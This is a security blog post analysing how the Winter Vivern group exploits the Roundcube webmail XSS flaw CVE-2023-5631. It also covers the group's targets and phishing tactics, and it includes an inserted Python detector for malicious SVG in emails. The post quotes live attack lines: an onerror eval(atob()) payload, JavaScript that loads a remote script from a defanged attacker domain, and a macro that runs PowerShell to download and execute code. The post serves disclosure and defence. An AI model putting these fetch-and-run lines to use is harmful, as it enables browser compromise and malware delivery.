
(30/10/23) Blog 303 – Winter Vivern exploiting RoundCube email vulnerability

Roundcube, the popular open-source webmail service, is being actively targeted by a threat actor whose past attacks align with the objectives of the Russian and Belarusian governments.

The threat actor is tracked as Winter Vivern and has been seen exploiting a recent vulnerability in the Roundcube service which allows for cross-site scripting (XSS) attacks via a specially crafted email message.

CVE-2023-5631

The vulnerability (CVE-2023-5631) can be exploited by sending an email containing a malicious value that carries an encoded string. When the Roundcube email client attempts to decode the string, it incorrectly handles the decoded data, leading to exploitation.

In the example below, a seemingly benign HTML email message contains a tag at the bottom that wraps an svg tag (SVG = Scalable Vector Graphics).

The HTML svg tag contains some data which needs to be processed:

<div><svg><use href="data:image/svg+xml;base64.PHNsZYBpZD*ieCI<******>#x"></div>

When the Roundcube client attempts to process the tag to identify and retrieve the image, it processes the base64-encoded information, which causes an error; in this case, the id attribute has an invalid value of “x”.

<svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The system then passes the invalid data to the error-handling component, which proceeds to decode the remaining base64-encoded data:

var fe=document.createElement('script');fe.src="https://recsecas[.]com/controlserver/checkupdate.js"; document.body.appendChild(fe);

This decoded JavaScript file is then processed in the context of the user's browser, thus achieving the XSS attack.

As such, by sending a specially crafted email message, the threat actors are able to load arbitrary JavaScript code in the context of the Roundcube user’s browser window.

No manual interaction other than viewing the message in a web browser is required.
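As an added illustration (not code from this blog or from the Roundcube project), the following Python scanner walks an email's HTML body, decodes any base64 SVG data: URIs found in attributes, and reports inline event-handler attributes such as onerror at every nesting level, which is the two-stage structure described above. The sample email HTML is constructed here and is not taken from a real campaign.

```python
import base64
import re
from html.parser import HTMLParser
from typing import List

# Inline event handlers (onerror, onload, ...) have no business inside mail HTML.
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)
# Base64-encoded SVG embedded as a data: URI; the fragment (e.g. "#x") is ignored.
SVG_DATA_URI = re.compile(r"^data:image/svg\+xml;base64,(?P<b64>[A-Za-z0-9+/=]+)", re.IGNORECASE)


class _SvgScanner(HTMLParser):
    """Collects event-handler attributes and embedded SVG data: URIs from one HTML layer."""

    def __init__(self) -> None:
        super().__init__()
        self.handlers: List[str] = []
        self.data_uris: List[str] = []

    def handle_starttag(self, tag, attrs):  # also invoked for self-closing tags
        for name, value in attrs:
            if value is None:
                continue
            if EVENT_ATTR.match(name):
                self.handlers.append(f"<{tag} {name}>")
            match = SVG_DATA_URI.match(value.strip())
            if match:
                self.data_uris.append(match.group("b64"))


def find_event_handlers(html: str, depth: int = 0, max_depth: int = 3) -> List[str]:
    """Return findings like 'depth 1: <image onerror>', recursing into embedded SVG."""
    scanner = _SvgScanner()
    scanner.feed(html)
    scanner.close()
    findings = [f"depth {depth}: {h}" for h in scanner.handlers]
    if depth < max_depth:
        for b64 in scanner.data_uris:
            try:
                inner = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError; skip undecodable blobs
                continue
            findings.extend(find_event_handlers(inner, depth + 1, max_depth))
    return findings


# Constructed sample: an inner SVG with an onerror handler, wrapped as a base64 data: URI
# inside an outer <use> element, mirroring the structure shown above (payload is a console.log).
INNER_SVG = ('<svg xmlns="http://www.w3.org/2000/svg">'
             '<image href="x" onerror="console.log(\'constructed sample\')"/></svg>')
SAMPLE_EMAIL_HTML = ('<div><p>Quarterly report attached.</p><svg><use href="data:image/svg+xml;base64,'
                     + base64.b64encode(INNER_SVG.encode()).decode() + '#x"></use></svg></div>')
BENIGN_HTML = '<div><p>Hello</p><img src="cid:logo@example"></div>'
```

Run against a parsed message's text/html part; any non-empty result is worth quarantining or alerting on.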

Roundcube released an update to address this vulnerability on the 14th of October, but many users have not yet updated their systems.

Who are Winter Vivern?

Winter Vivern is an APT group that has been tracked since early 2021, initially by DomainTools and since then by many other security researchers and threat analysis groups.

DomainTools initially observed the threat actor using a malicious Microsoft Excel macro which reached back from compromised victims in Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine, and the Vatican to a C2 server using an HTTP URL with “wintervivern” in the path, as seen below.

CALL("kernel32","WinExec","JCJ","powershell -c ""iex (New-Object Net.Webclient).DownloadString( 'https://secure-daddy[.]com/wintervivern/server/serverHttpRequest(RUN).txt')""",0)

More recently Winter Vivern has targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government. The APT has also been actively targeting private businesses, including telecommunications organizations that support Ukraine in the ongoing war.

Social Engineering tactics

Winter Vivern’s tactics typically include the use of malicious documents, often generated by copying authentic government documents which are publicly available or by creating ones tailored to specific themes.

More recently, the group has started mimicking government domains to distribute malicious downloads.

Earlier this year, Winter Vivern targeted specific government websites by creating individual pages on a single malicious domain that closely resembled those of Poland’s Central Bureau for Combating Cybercrime, the Ukraine Ministry of Foreign Affairs, and the Security Service of Ukraine.